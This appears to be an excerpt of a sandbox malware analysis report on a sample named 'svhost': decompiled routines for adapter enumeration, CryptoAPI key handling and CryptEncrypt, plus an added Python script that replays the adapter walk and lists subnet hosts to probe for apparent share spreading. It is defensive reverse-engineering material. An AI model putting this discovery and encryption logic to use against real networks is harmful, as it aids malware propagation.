                                      • Opcode Fuzzy Hash: 925af7ff6c3dfea20d90850ab49190413cb6cb23b772587267281de4b94fe4f6
                                      • Instruction Fuzzy Hash: 97519F71A00209AFDB10EFA5DC41BEFB3B8FF49700F145569E604FB192E7719A458B61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 73%
                                      Analyst note: this is the routine that enumerates local network adapters. The 0x288-byte allocation is sizeof(IP_ADAPTER_INFO) for a 32-bit build (64-bit time_t), the return value 0x6f compared after the first GetAdaptersInfo call is ERROR_BUFFER_OVERFLOW (the else branch frees the buffer, re-allocates with the size GetAdaptersInfo wrote back into _v64 and retries), and the loop follows each record's Next pointer while reading offset 0x1b0, which is IpAddressList.IpAddress.String, i.e. the adapter's IPv4 address as text. What the callees E00E6DAC0 and E00E6DB40 do with each address is not visible in this listing.
                                      			E00E6D910(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v21;
                                      				char _v36;
                                      				char _v60;
                                      				char _v64;
                                      				signed int _v68;
                                      				signed int _v72;
                                      				char _v73;
                                      				intOrPtr _v80;
                                      				char _v104;
                                      				signed int _t50;
                                      				signed int _t51;
                                      				signed int _t56;
                                      				signed int _t57;
                                      				void* _t70;
                                      				signed char _t71;
                                      				void* _t85;
                                      				void* _t117;
                                      				void* _t118;
                                      				signed int _t119;
                                      				void* _t120;
                                      				void* _t122;
                                      
                                      				_t118 = __esi;
                                      				_t117 = __edi;
                                      				_t113 = __edx;
                                      				_t85 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec0d90);
                                      				_push( *[fs:0x0]);
                                      				_t50 =  *0xeef074; // 0x221cac15
                                      				_t51 = _t50 ^ _t119;
                                      				_v20 = _t51;
                                      				_push(_t51);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v80 = __ecx;
                                      				E00E515C0( &_v36, 0xc);
                                      				E00E566A0( &_v36);
                                      				_v73 = 0;
                                      				_v64 = 0x288;
                                      				_push(0x288);
                                      				_t56 = E00EA49B4();
                                      				_t122 = _t120 - 0x58 + 4;
                                      				_v68 = _t56;
                                      				if(_v68 != 0) {
                                      					_t57 = _v68;
                                      					__imp__GetAdaptersInfo(_t57,  &_v64);
                                      					__eflags = _t57 - 0x6f;
                                      					if(_t57 != 0x6f) {
                                      						L5:
                                      						_t113 = _v68;
                                      						__imp__GetAdaptersInfo(_v68,  &_v64);
                                      						__eflags = _t57;
                                      						if(_t57 == 0) {
                                      							_v72 = _v68;
                                      							while(1) {
                                      								__eflags = _v72;
                                      								if(__eflags == 0) {
                                      									goto L11;
                                      								}
                                      								E00E58000(_t85,  &_v104, _t117, _t118, __eflags, _v72 + 0x1b0);
                                      								E00E6DAC0(_t85,  &_v21,  &_v104, _t117, _t118, __eflags,  &_v60,  &_v104);
                                      								E00E57F50( &_v104);
                                      								_t70 = E00E51650( &_v60);
                                      								_t122 = _t122 + 4;
                                      								_t71 = E00E6DB40(_t85, _v80, _t117, _t118, _t70, 0x3e8);
                                      								__eflags = _t71 & 0x000000ff;
                                      								if((_t71 & 0x000000ff) != 0) {
                                      									E00E6D830(_t85,  &_v36, _t117, _t118,  &_v60);
                                      								}
                                      								_t113 =  *_v72;
                                      								_v72 =  *_v72;
                                      								E00E57B40( &_v60);
                                      							}
                                      						}
                                      						L11:
                                      						E00EA478C(_v68);
                                      						E00E57460(_a4, E00E51650( &_v36));
                                      						E00E578B0( &_v36);
                                      					} else {
                                      						E00EA478C(_v68);
                                      						_t113 = _v64;
                                      						_push(_v64);
                                      						_t57 = E00EA49B4();
                                      						_t122 = _t122 + 8;
                                      						_v68 = _t57;
                                      						__eflags = _v68;
                                      						if(_v68 != 0) {
                                      							goto L5;
                                      						} else {
                                      							E00E57460(_a4, E00E51650( &_v36));
                                      							E00E578B0( &_v36);
                                      						}
                                      					}
                                      				} else {
                                      					E00E57460(_a4, E00E51650( &_v36));
                                      					E00E578B0( &_v36);
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t85, _v20 ^ _t119, _t113, _t117, _t118);
                                      			}
                                      • Statement addresses: side column of the C-code listing above (one address per line), spanning 0x00e6d910 to 0x00e6dab8; the per-line alignment was not preserved in this extraction.

                                      APIs
                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00E6D99C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdaptersInfo
                                      • String ID:
                                      • API String ID: 3177971545-0
                                      • Opcode ID: b7990e7351a91c8ce3017f244a5c4578e9bc00abb928aef667b914dc96abd7f4
                                      • Instruction ID: 7a9e453ee23acbc9b69c7147de1d3526b02873dea401825359885f6e92b79f4a
                                      • Opcode Fuzzy Hash: b7990e7351a91c8ce3017f244a5c4578e9bc00abb928aef667b914dc96abd7f4
                                      • Instruction Fuzzy Hash: 4A5150B1D08118DBCB04EFA0EC51EEEB7B8BF58344F445529F906B7291EB74AA09CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%
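The decompilation of E00E6D910 turns on three constants: the 0x288-byte allocation, the 0x6f (ERROR_BUFFER_OVERFLOW) retry check, and the read at offset 0x1b0 inside the adapter loop. The following Python is an added worked example, not code from the Joe Sandbox report or from the sample: it re-creates the 32-bit IP_ADAPTER_INFO layout with ctypes (pointers modelled as 32-bit integers so the check works on any host), verifies those constants against it, and replays the decompiled loop over a constructed two-adapter buffer placed at an assumed base address. The adapter names, addresses and base address are constructed test data, and candidate_hosts is an assumption about how the collected address/mask pairs would be used for share spreading, since the callees E00E6DAC0/E00E6DB40 are not shown in the listing.

```python
"""Added analyst aid (not part of the Joe Sandbox report or the sample):
re-creates the 32-bit IP_ADAPTER_INFO layout that E00E6D910 walks, checks the
constants seen in the decompilation (0x288, 0x6f, 0x1b0) against it, and
replays the adapter loop over a constructed buffer."""
import ctypes
import ipaddress

ERROR_BUFFER_OVERFLOW = 0x6F   # the 0x6f compared against GetAdaptersInfo's first return value


class IP_ADDRESS_STRING(ctypes.Structure):
    _fields_ = [("String", ctypes.c_char * 16)]


class IP_ADDR_STRING(ctypes.Structure):
    # Pointers are modelled as c_uint32 so the layout matches a 32-bit Windows build
    # regardless of the host this script runs on.
    _fields_ = [
        ("Next", ctypes.c_uint32),
        ("IpAddress", IP_ADDRESS_STRING),
        ("IpMask", IP_ADDRESS_STRING),
        ("Context", ctypes.c_uint32),
    ]


class IP_ADAPTER_INFO(ctypes.Structure):
    _fields_ = [
        ("Next", ctypes.c_uint32),
        ("ComboIndex", ctypes.c_uint32),
        ("AdapterName", ctypes.c_char * 260),    # MAX_ADAPTER_NAME_LENGTH + 4
        ("Description", ctypes.c_char * 132),    # MAX_ADAPTER_DESCRIPTION_LENGTH + 4
        ("AddressLength", ctypes.c_uint32),
        ("Address", ctypes.c_ubyte * 8),         # MAX_ADAPTER_ADDRESS_LENGTH
        ("Index", ctypes.c_uint32),
        ("Type", ctypes.c_uint32),
        ("DhcpEnabled", ctypes.c_uint32),
        ("CurrentIpAddress", ctypes.c_uint32),
        ("IpAddressList", IP_ADDR_STRING),
        ("GatewayList", IP_ADDR_STRING),
        ("DhcpServer", IP_ADDR_STRING),
        ("HaveWins", ctypes.c_int32),
        ("PrimaryWinsServer", IP_ADDR_STRING),
        ("SecondaryWinsServer", IP_ADDR_STRING),
        ("LeaseObtained", ctypes.c_int64),       # time_t is 64-bit in MSVC even on x86
        ("LeaseExpires", ctypes.c_int64),
    ]


SIZEOF_IP_ADAPTER_INFO = ctypes.sizeof(IP_ADAPTER_INFO)                                  # 0x288
OFF_IP_ADDRESS = IP_ADAPTER_INFO.IpAddressList.offset + IP_ADDR_STRING.IpAddress.offset  # 0x1b0
OFF_IP_MASK = IP_ADAPTER_INFO.IpAddressList.offset + IP_ADDR_STRING.IpMask.offset        # 0x1c0


def build_adapter_table(base, adapters):
    """Lay out `adapters` ([(name, ip, mask), ...]) the way GetAdaptersInfo fills its
    caller's buffer when that buffer lives at virtual address `base`: one record per
    adapter, each Next pointing at the following record, the last Next NULL."""
    buf = bytearray(SIZEOF_IP_ADAPTER_INFO * len(adapters))
    for i, (name, ip, mask) in enumerate(adapters):
        rec = IP_ADAPTER_INFO.from_buffer(buf, i * SIZEOF_IP_ADAPTER_INFO)
        rec.AdapterName = name.encode()
        rec.IpAddressList.IpAddress.String = ip.encode()
        rec.IpAddressList.IpMask.String = mask.encode()
        rec.Next = base + (i + 1) * SIZEOF_IP_ADAPTER_INFO if i + 1 < len(adapters) else 0
    return bytes(buf)


def _cstr(buf, off):
    """Read a NUL-terminated IP_ADDRESS_STRING (16 bytes) at `off`."""
    return bytes(buf[off:off + 16]).split(b"\0", 1)[0].decode()


def walk_adapters(buf, base):
    """Replay the loop in E00E6D910: start at the buffer head, read the string at
    +0x1b0 (IpAddressList.IpAddress.String), then follow *(DWORD*)cur (Next) until
    NULL. Returns [(ip, mask), ...]."""
    found = []
    cur = base
    while cur != 0:
        off = cur - base
        found.append((_cstr(buf, off + OFF_IP_ADDRESS), _cstr(buf, off + OFF_IP_MASK)))
        cur = int.from_bytes(buf[off:off + 4], "little")
    return found


def candidate_hosts(ip, mask):
    """Every other host on the adapter's subnet. Assumption (the callees are not shown):
    this is what a share-spreading routine would derive from the address/mask pair."""
    net = ipaddress.IPv4Network((ip, mask), strict=False)
    own = ipaddress.IPv4Address(ip)
    return [str(h) for h in net.hosts() if h != own]


if __name__ == "__main__":
    assert SIZEOF_IP_ADAPTER_INFO == 0x288 and OFF_IP_ADDRESS == 0x1B0
    BASE = 0x00520000   # constructed heap address for the sample buffer
    table = build_adapter_table(BASE, [("{A1}", "10.0.0.5", "255.255.255.0"),
                                       ("{B2}", "172.16.4.20", "255.255.254.0")])
    for ip, mask in walk_adapters(table, BASE):
        print(ip, mask, len(candidate_hosts(ip, mask)), "hosts to probe")
```

If the offsets had not lined up, the 0x1b0 read would have landed in GatewayList or Description rather than the adapter's own address, so this check is worth running before attributing the loop to subnet discovery.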

                                      C-Code - Quality: 80%
                                      Analyst note: this routine matches the MSVC CRT helper _call_reportfault. It zeroes an 0x50-byte EXCEPTION_RECORD and a 0x2cc-byte x86 CONTEXT, sets ContextFlags to 0x10001 (CONTEXT_CONTROL), fills ExceptionCode and ExceptionFlags from its arguments, then calls SetUnhandledExceptionFilter(NULL) followed by UnhandledExceptionFilter. The IsDebuggerPresent result only decides whether to re-invoke the CRT debugger hook (E00E8A86B) after the fault has been reported, so the "IsDebuggerPresent" signature is satisfied by CRT boilerplate here and is not on its own evidence of anti-debugging logic in the sample.
                                      			E00EA47A7(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                      				char _v0;
                                      				signed int _v8;
                                      				intOrPtr _v524;
                                      				intOrPtr _v528;
                                      				void* _v532;
                                      				intOrPtr _v536;
                                      				char _v540;
                                      				intOrPtr _v544;
                                      				intOrPtr _v548;
                                      				intOrPtr _v552;
                                      				intOrPtr _v556;
                                      				intOrPtr _v560;
                                      				intOrPtr _v564;
                                      				intOrPtr _v568;
                                      				intOrPtr _v572;
                                      				intOrPtr _v576;
                                      				intOrPtr _v580;
                                      				intOrPtr _v584;
                                      				char _v724;
                                      				intOrPtr _v792;
                                      				intOrPtr _v800;
                                      				char _v804;
                                      				struct _EXCEPTION_POINTERS _v812;
                                      				void* __edi;
                                      				signed int _t40;
                                      				char* _t47;
                                      				char* _t49;
                                      				intOrPtr _t61;
                                      				intOrPtr _t62;
                                      				intOrPtr _t66;
                                      				intOrPtr _t67;
                                      				int _t68;
                                      				void* _t69;
                                      				intOrPtr _t70;
                                      				signed int _t72;
                                      				signed int _t74;
                                      
                                      				_t70 = __esi;
                                      				_t66 = __edx;
                                      				_t61 = __ebx;
                                      				_t72 = _t74;
                                      				_t40 =  *0xeef074; // 0x221cac15
                                      				_t41 = _t40 ^ _t72;
                                      				_v8 = _t40 ^ _t72;
                                      				_push(_t67);
                                      				if(_a4 != 0xffffffff) {
                                      					_push(_a4);
                                      					E00E8A86B(_t41);
                                      					_pop(_t62);
                                      				}
                                      				E00EA1270(_t67,  &_v804, 0, 0x50);
                                      				E00EA1270(_t67,  &_v724, 0, 0x2cc);
                                      				_v812.ExceptionRecord =  &_v804;
                                      				_t47 =  &_v724;
                                      				_v812.ContextRecord = _t47;
                                      				_v548 = _t47;
                                      				_v552 = _t62;
                                      				_v556 = _t66;
                                      				_v560 = _t61;
                                      				_v564 = _t70;
                                      				_v568 = _t67;
                                      				_v524 = ss;
                                      				_v536 = cs;
                                      				_v572 = ds;
                                      				_v576 = es;
                                      				_v580 = fs;
                                      				_v584 = gs;
                                      				asm("pushfd");
                                      				_pop( *_t22);
                                      				_v540 = _v0;
                                      				_t49 =  &_v0;
                                      				_v528 = _t49;
                                      				_v724 = 0x10001;
                                      				_v544 =  *((intOrPtr*)(_t49 - 4));
                                      				_v804 = _a8;
                                      				_v800 = _a12;
                                      				_v792 = _v0;
                                      				_t68 = IsDebuggerPresent();
                                      				SetUnhandledExceptionFilter(0);
                                      				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                      					_push(_a4);
                                      					E00E8A86B(_t57);
                                      				}
                                      				_pop(_t69);
                                      				return E00E89A35(_t61, _v8 ^ _t72, _t66, _t69, _t70);
                                      			}
                                      • Statement addresses: side column of the C-code listing above (one address per line), spanning 0x00ea47a7 to 0x00ea48df; the per-line alignment was not preserved in this extraction.

                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 00EA489F
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EA48A9
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00EA48B6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 951c71b35b6e3876c96674d84560c0e6faee1b2d6190b8e9e7b84f6eb4cd9556
                                      • Instruction ID: 7511af37e522522542347a9ee4ce6fa9ece3f7206605967d6c4228cc40d00992
                                      • Opcode Fuzzy Hash: 951c71b35b6e3876c96674d84560c0e6faee1b2d6190b8e9e7b84f6eb4cd9556
                                      • Instruction Fuzzy Hash: 5B31F4B49013189BCB21EF65D889B8DBBF8BF08310F1051EAE41CA72A1E7709B858F44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00E655A0(intOrPtr __ecx) {
                                      				intOrPtr _v8;
                                      				intOrPtr _t30;
                                      
                                      				// Destructor-style cleanup of a CryptoAPI state object (this = __ecx):
                                      				// frees the helper object at +0x10, destroys the key handle at +4 and
                                      				// releases the two provider contexts at +0xc and +8, zeroing each field.
                                      				_push(__ecx);
                                      				_v8 = __ecx;
                                      				if( *(_v8 + 0x10) != 0) {
                                      					E00E660D0(_v8,  *(_v8 + 0x10));
                                      					 *(_v8 + 0x10) = 0;
                                      				}
                                      				if( *(_v8 + 4) != 0) {
                                      					CryptDestroyKey( *(_v8 + 4));
                                      					 *(_v8 + 4) = 0;
                                      				}
                                      				if( *(_v8 + 0xc) != 0) {
                                      					CryptReleaseContext( *(_v8 + 0xc), 0);
                                      					 *(_v8 + 0xc) = 0;
                                      				}
                                      				_t30 = _v8;
                                      				if( *(_t30 + 8) != 0) {
                                      					CryptReleaseContext( *(_v8 + 8), 0);
                                      					_t30 = _v8;
                                      					 *(_t30 + 8) = 0;
                                      				}
                                      				 *((char*)(_v8 + 1)) = 0;
                                      				return _t30;
                                      			}

                                      APIs
                                      • CryptDestroyKey.ADVAPI32(?,00000000,?,00E65585,?,?,00E55DDC,00000000,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E655D9
                                      • CryptReleaseContext.ADVAPI32(?,00000000,00000000,?,00E65585,?,?,00E55DDC,00000000,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E655FB
                                      • CryptReleaseContext.ADVAPI32(?,00000000,00000000,?,00E65585,?,?,00E55DDC,00000000,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E6561D
                                        • Part of subcall function 00E660D0: CryptDestroyKey.ADVAPI32(00000000,00000000,?,00E655BF,?,00000000,?,00E65585,?), ref: 00E660E1
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$ContextDestroyRelease
                                      • String ID:
                                      • API String ID: 1322390979-0
                                      • Opcode ID: 059303f2425525d05cc9bb8c4311d64d66b214d391c94e15e39829e47614aec2
                                      • Instruction ID: 227afee49eb8419a287fc6de111fd0d6c936c1e6c611a703b56b710f97d9e56b
                                      • Opcode Fuzzy Hash: 059303f2425525d05cc9bb8c4311d64d66b214d391c94e15e39829e47614aec2
                                      • Instruction Fuzzy Hash: CB11C674640208EFD704CF85D698B9DF7B2BB48308F248198E5056B391C776EE45DB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 16%
                                      			E00E65D30(intOrPtr __ecx) {
                                      				char _v5;
                                      				intOrPtr _v12;
                                      				intOrPtr _t9;
                                      				long _t11;
                                      
                                      				// Lazily acquires a CryptoAPI provider handle into the field at +8.
                                      				// dwProvType 0x18 is PROV_RSA_AES; the first attempt passes no flags, and
                                      				// only if it fails with NTE_BAD_KEYSET (0x80090016) is it retried with
                                      				// CRYPT_NEWKEYSET (8) to create the key container. Returns 1 on success.
                                      				_v12 = __ecx;
                                      				_t9 = _v12;
                                      				if( *((intOrPtr*)(_t9 + 8)) == 0) {
                                      					__imp__CryptAcquireContextW(_v12 + 8, 0, 0, 0x18, 0);
                                      					if(_t9 != 0) {
                                      						return 1;
                                      					}
                                      					_t11 = GetLastError();
                                      					if(_t11 != 0x80090016) {
                                      						return 0;
                                      					}
                                      					__imp__CryptAcquireContextW(_v12 + 8, 0, 0, 0x18, 8);
                                      					if(_t11 == 0) {
                                      						_v5 = 0;
                                      					} else {
                                      						_v5 = 1;
                                      					}
                                      					return _v5;
                                      				}
                                      				return 1;
                                      			}

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(00E55DD4,00000000,00000000,00000018,00000000,00E55DDC,00000000,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65D55
                                      • GetLastError.KERNEL32(?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65D5F
                                      • CryptAcquireContextW.ADVAPI32(00000010,00000000,00000000,00000018,00000008,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65D7B
                                      Yara matches
                                      Similarity
                                      • API ID: AcquireContextCrypt$ErrorLast
                                      • String ID:
                                      • API String ID: 2779411412-0
                                      • Opcode ID: 622ff228466dd10b635fa4c3cffee029c42754d83c5e95280a11dcc82a8ac1e3
                                      • Instruction ID: f4af3ed286ed2e53f4dec6064fa5e6afd33baed686c986fbc187177148ef1f51
                                      • Opcode Fuzzy Hash: 622ff228466dd10b635fa4c3cffee029c42754d83c5e95280a11dcc82a8ac1e3
                                      • Instruction Fuzzy Hash: B40149317C8708FBD7104B50AC4EFEF3B605B5170AF105084E6017E1C1C2769849A761
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,?,00E722CD,00E517EA,?,?,?,00E517EA,221CAC15), ref: 00E772F9
                                      • GetSystemTimeAsFileTime.KERNEL32(00E517EA,?,?,00E722CD,00E517EA,?,?,?,00E517EA,221CAC15), ref: 00E772FD
                                      Yara matches
                                      Similarity
                                      • API ID: Time$FileSystem$Precise
                                      • String ID:
                                      • API String ID: 743729956-0
                                      • Opcode ID: f7314946a8b9b68b614065fafc97ecb99b430ecde30ac4e24af3393c359d070a
                                      • Instruction ID: f91346754570005c0d203e1a383615364cbe226de9e3548bf11488bce5d1bc18
                                      • Opcode Fuzzy Hash: f7314946a8b9b68b614065fafc97ecb99b430ecde30ac4e24af3393c359d070a
                                      • Instruction Fuzzy Hash: 60D0A972905068AF8A022B8AFC148ACBB39AB48B113084029FA8972120CB2218169BC0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00E6F13F() {
                                      				void* _t5;
                                      
                                      				return HeapFree(GetProcessHeap(), 0,  *(_t5 - 0x4c));
                                      			}

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000000,00E6F13D), ref: 00E6F145
                                      • HeapFree.KERNEL32(00000000), ref: 00E6F14C
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 0ee0cd177f5280118fd8ddcafc17fe4a775862d47608c2092361521358479248
                                      • Instruction ID: f8e25f80f208d81fc27d079df23219ab122590c522d160e959649a282961c6ae
                                      • Opcode Fuzzy Hash: 0ee0cd177f5280118fd8ddcafc17fe4a775862d47608c2092361521358479248
                                      • Instruction Fuzzy Hash: E8B092B2950100AFDF049BE1EC2EF5D3A38BB44302F000114F206A20D08A61144ACB22
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E00EB9297(void* __ecx, void* __edx, void* __eflags, signed int* _a4) {
                                      				intOrPtr _t26;
                                      				intOrPtr _t29;
                                      				signed int _t32;
                                      				signed char _t33;
                                      				signed char _t34;
                                      				intOrPtr* _t38;
                                      				intOrPtr* _t41;
                                      				signed int _t47;
                                      				void* _t50;
                                      				void* _t51;
                                      				signed int* _t52;
                                      				void* _t53;
                                      				signed int _t62;
                                      
                                      				_t53 = E00EB0EFC(__ecx, __edx);
                                      				_t47 = 2;
                                      				_t38 =  *((intOrPtr*)(_t53 + 0x50));
                                      				_t50 = _t38 + 2;
                                      				do {
                                      					_t26 =  *_t38;
                                      					_t38 = _t38 + _t47;
                                      				} while (_t26 != 0);
                                      				_t41 =  *((intOrPtr*)(_t53 + 0x54));
                                      				 *(_t53 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
                                      				_t51 = _t41 + 2;
                                      				do {
                                      					_t29 =  *_t41;
                                      					_t41 = _t41 + _t47;
                                      				} while (_t29 != 0);
                                      				_t52 = _a4;
                                      				 *(_t53 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
                                      				_t52[1] = 0;
                                      				if( *(_t53 + 0x60) == 0) {
                                      					_t47 = E00EB9391( *((intOrPtr*)(_t53 + 0x50)));
                                      				}
                                      				 *(_t53 + 0x5c) = _t47;
                                      				_t32 = EnumSystemLocalesW(0xeb93bd, 1);
                                      				_t62 =  *_t52 & 0x00000007;
                                      				asm("bt ecx, 0x9");
                                      				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
                                      				asm("bt ecx, 0x8");
                                      				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
                                      				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
                                      					 *_t52 = 0;
                                      					return _t34;
                                      				}
                                      				return _t34;
                                      			}

                                      APIs
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      • EnumSystemLocalesW.KERNEL32(00EB93BD,00000001,00000000,?,-00000050,?,00EB99EB,00000000,?,?,?,00000055,?), ref: 00EB9309
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem
                                      • String ID:
                                      • API String ID: 2417226690-0
                                      • Opcode ID: e30e7159dca0511055894a9a9cee9f67de055d37872ded84299aee338d86b143
                                      • Instruction ID: 9b94233dd5fc611a2f31ee75028767dc4656e1d7d81ec6623299bbed1b500ef8
                                      • Opcode Fuzzy Hash: e30e7159dca0511055894a9a9cee9f67de055d37872ded84299aee338d86b143
                                      • Instruction Fuzzy Hash: 941125366003015FDB189F39D8916FBB7D1FF80358B18842CEA86A7A41D371B842CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00EB9332(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
                                      				intOrPtr _t11;
                                      				signed char* _t15;
                                      				intOrPtr* _t19;
                                      				intOrPtr _t24;
                                      				void* _t25;
                                      				void* _t26;
                                      
                                      				_t26 = E00EB0EFC(__ecx, __edx);
                                      				_t24 = 2;
                                      				_t19 =  *((intOrPtr*)(_t26 + 0x50));
                                      				_t25 = _t19 + 2;
                                      				do {
                                      					_t11 =  *_t19;
                                      					_t19 = _t19 + _t24;
                                      				} while (_t11 != 0);
                                      				_t4 = _t19 - _t25 >> 1 == 3;
                                      				 *(_t26 + 0x60) = 0 | _t4;
                                      				if(_t4 != 0) {
                                      					_t24 = E00EB9391( *((intOrPtr*)(_t26 + 0x50)));
                                      				}
                                      				 *((intOrPtr*)(_t26 + 0x5c)) = _t24;
                                      				EnumSystemLocalesW(0xeb9610, 1);
                                      				_t15 = _a4;
                                      				if(( *_t15 & 0x00000004) == 0) {
                                      					 *_t15 = 0;
                                      					return _t15;
                                      				}
                                      				return _t15;
                                      			}

                                      APIs
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      • EnumSystemLocalesW.KERNEL32(00EB9610,00000001,00000001,?,-00000050,?,00EB99AF,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00EB937C
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem
                                      • String ID:
                                      • API String ID: 2417226690-0
                                      • Opcode ID: bb90879eec411caa07653583f17338dfa30a2789853ada4476b0ae49b748e181
                                      • Instruction ID: ace8610997af1118c50adfe0f3a2269cd2a57bb46054596ac1cbada98a04e5d8
                                      • Opcode Fuzzy Hash: bb90879eec411caa07653583f17338dfa30a2789853ada4476b0ae49b748e181
                                      • Instruction Fuzzy Hash: 70F0F6362003045FDB245F799881ABB7BD1EF81368F19842DFB46AB6D1D671AC42C750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E00E661A0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, char _a16, intOrPtr _a20) {
                                      				char _v16;
                                      				char _v17;
                                      				intOrPtr _v24;
                                      				signed int _t13;
                                      				intOrPtr _t18;
                                      				signed int _t26;
                                      
                                      				_t13 =  *0xeef074; // 0x221cac15
                                      				 *[fs:0x0] =  &_v16;
                                      				_v24 = __ecx;
                                      				_t18 = _a4;
                                      				__imp__CryptEncrypt(_t18, 0, _a8 & 0x000000ff, 0, E00E634C0(_a12, 0),  &_a16, _a20, _t13 ^ _t26,  *[fs:0x0], 0xec0490, 0xffffffff);
                                      				if(_t18 == 0) {
                                      					_v17 = 0;
                                      				} else {
                                      					_v17 = 1;
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return _v17;
                                      			}

                                      Addresses (decompiler address column): 0x00e661b4, 0x00e661bf, 0x00e661c5, 0x00e661e4, 0x00e661e8, 0x00e661f0, 0x00e661f8, 0x00e661f2, 0x00e661f2, 0x00e661f2, 0x00e66202, 0x00e6620d

                                      APIs
                                      • CryptEncrypt.ADVAPI32(00000001,00000000,221CAC15,00000000,00000000,00000000,?,?,221CAC15,00000001,00000000,00000000,221CAC15), ref: 00E661E8
                                      Memory Dump Source
